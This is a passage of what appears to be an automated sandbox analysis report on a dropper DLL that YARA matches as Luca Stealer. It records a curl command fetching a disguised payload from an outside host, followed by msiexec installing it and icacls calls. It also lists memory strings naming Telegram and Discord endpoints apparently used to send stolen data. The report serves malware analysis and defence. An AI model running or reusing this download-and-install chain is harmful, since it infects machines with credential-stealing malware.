Source: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe	Code function: 39_2_00007FFC2356F75C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		39_2_00007FFC2356F75C
Source: C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe	Code function: 47_2_00007FFC23C6F75C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		47_2_00007FFC23C6F75C

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL (CI)(OI)HIGH	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL (CI)(OI)LOW	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\." /SETINTEGRITYLEVEL (CI)(OI)LOW	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\." /SETINTEGRITYLEVEL (CI)(OI)LOW

Source: UIServices.exe, 00000027.00000003.339453471.0000029C1E7A5000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.382230873.0000027DB72EB000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.440966542.0000018E5AAEB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: UIServices.exe, 00000027.00000003.339453471.0000029C1E7A5000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.382230873.0000027DB72EB000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.440966542.0000018E5AAEB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd&
Source: UIServices.exe, 00000027.00000003.339453471.0000029C1E7A5000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.382230873.0000027DB72EB000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.440966542.0000018E5AAEB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWndba
Source: UIServices.exe, 00000027.00000003.339453471.0000029C1E7A5000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.382230873.0000027DB72EB000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.440966542.0000018E5AAEB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd7

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe

Code function: 39_2_00007FF79738C110 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

39_2_00007FF79738C110

Stealing of Sensitive Information

Yara detected Luca Stealer

Source: Yara match	File source: Process Memory Space: UIServices.exe PID: 3560, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UIServices.exe PID: 5736, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UIServices.exe PID: 3928, type: MEMORYSTR

Remote Access Functionality

Yara detected Luca Stealer

Source: Yara match	File source: Process Memory Space: UIServices.exe PID: 3560, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UIServices.exe PID: 5736, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UIServices.exe PID: 3928, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
191.252.51.12	anydesk10.hospedagemdesites.ws	Brazil		27715	LocawebServicosdeInternetSABR	false

Private

IP
192.168.2.1

Contacted Domains

Name	IP	Active
anydesk10.hospedagemdesites.ws	191.252.51.12	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://anydesk10.hospedagemdesites.ws/UIServices.jpg	false		high

Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Windows\Logs\DPX\setupact.log			Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Windows\Logs\DPX\setuperr.log			Jump to behavior

Source: SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: d:\agent\_work\2\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000025.00000003.305737619.00000000049C1000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmp, expand.exe, 0000002D.00000003.365492953.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000035.00000003.418909523.0000000003231000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.458293973.00007FFC23C70000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: C:\ss2\Projects\MsiWrapper\MsiCustomActions\Release\MsiCustomActions.pdb source: spclwow78x.msi.10.dr

Checks for available system drives (often done to infect USB drives)

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: c:
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Source: curl.exe, 0000000E.00000002.265327619.00000237F57C0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.265338006.00000237F57CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://anydesk10.hospedagemdesites.ws/UIServices.jpg
Source: cmd.exe, 00000005.00000002.258487106.000001E808BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.257861385.0000021271D60000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.265592954.000001E1230F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://anydesk10.hospedagemdesites.ws/UIServices.jpg-o%temp%
Source: curl.exe, 00000009.00000002.258205394.0000017782120000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000002.257455250.000001840CB40000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.265327619.00000237F57C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://anydesk10.hospedagemdesites.ws/UIServices.jpg-oC:
Source: UIServices.exe, 00000027.00000003.330989782.0000029C1E81D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.388069548.0000027DB7434000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.444621633.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: UIServices.exe, 00000039.00000003.444621633.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://canonicalizer.ucsuri.tcs/680074007400700073003a002f002f00700069006e0067002e002e00630068006500
Source: UIServices.exe, 00000027.00000003.330989782.0000029C1E81D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.388069548.0000027DB7434000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.444621633.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://canonicalizer.ucsuri.tcs/680074007400700073003a002f002f00700069006e0067002e002e006e0061007600
Source: UIServices.exe, 00000027.00000003.330989782.0000029C1E81D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.388069548.0000027DB7434000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.444621633.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: UIServices.exe, 00000027.00000003.330989782.0000029C1E81D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.388069548.0000027DB7434000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.444621633.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: http://ip-api.com/json/
Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: http://ipwhois.app/json/
Source: UIServices.exe, 00000027.00000003.330989782.0000029C1E81D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.388069548.0000027DB7434000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.444621633.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: UIServices.exe, 00000027.00000003.330989782.0000029C1E81D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.388069548.0000027DB7434000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.444621633.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://api.telegram.org/bot
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://curl.se/docs/hsts.html
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://discord.com/
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://discord.com/DDiscordBot
Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://discord.com/api/v10/applications//commands/
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://discord.com/api/v10/channels/
Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://discord.com/api/v10/gatewayhttps://discord.com/api/v10/gateway/bot
Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://discord.com/api/v10/guilds/iconbannerjoined_atstring
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://discord.com/api/v10/guildshttps://discord.com/api/v10/invites/
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://discord.com/api/v10/interactions//callback
Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://discord.com/api/v10/oauth2/applications/
Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://discord.com/api/v10/stage-instanceshttps://discord.com/api/v10/stage-instances/
Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://discord.com/api/v10/sticker-packshttps://discord.com/api/v10/users/
Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://discord.com/api/v10/users/
Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://discord.com/api/v10/voice/regionshttps://discord.com/api/v10/webhooks/
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-supportCalling
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://freegeoip.app/json/
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://freegeoip.app/json/X
Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://github.com/serenity-rs/serenity
Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://ipapi.co//json/
Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://status.discord.com/api/v2/incidents/unresolved.jsonhttps://status.discord.com/api/v2/schedul

Source: unknown

DNS traffic detected: queries for: anydesk10.hospedagemdesites.ws

Source: global traffic	HTTP traffic detected: GET /UIServices.jpg HTTP/1.1Host: anydesk10.hospedagemdesites.wsUser-Agent: curl/7.55.1Accept: /
Source: global traffic	HTTP traffic detected: GET /UIServices.jpg HTTP/1.1Host: anydesk10.hospedagemdesites.wsUser-Agent: curl/7.55.1Accept: /
